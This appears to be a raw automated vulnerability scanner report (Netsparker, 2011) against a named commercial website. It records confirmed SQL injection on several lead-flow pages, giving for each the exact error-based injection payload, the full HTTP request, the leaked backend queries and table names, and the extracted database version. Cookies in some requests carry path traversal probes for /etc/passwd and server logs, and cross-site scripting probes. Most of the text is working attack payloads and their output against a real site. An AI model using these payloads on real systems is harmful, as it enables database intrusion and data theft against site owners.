lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5t438bp1gms1s6nmbhomprbig0; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mdu7f547n6tf7da5n81d2luvh2; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 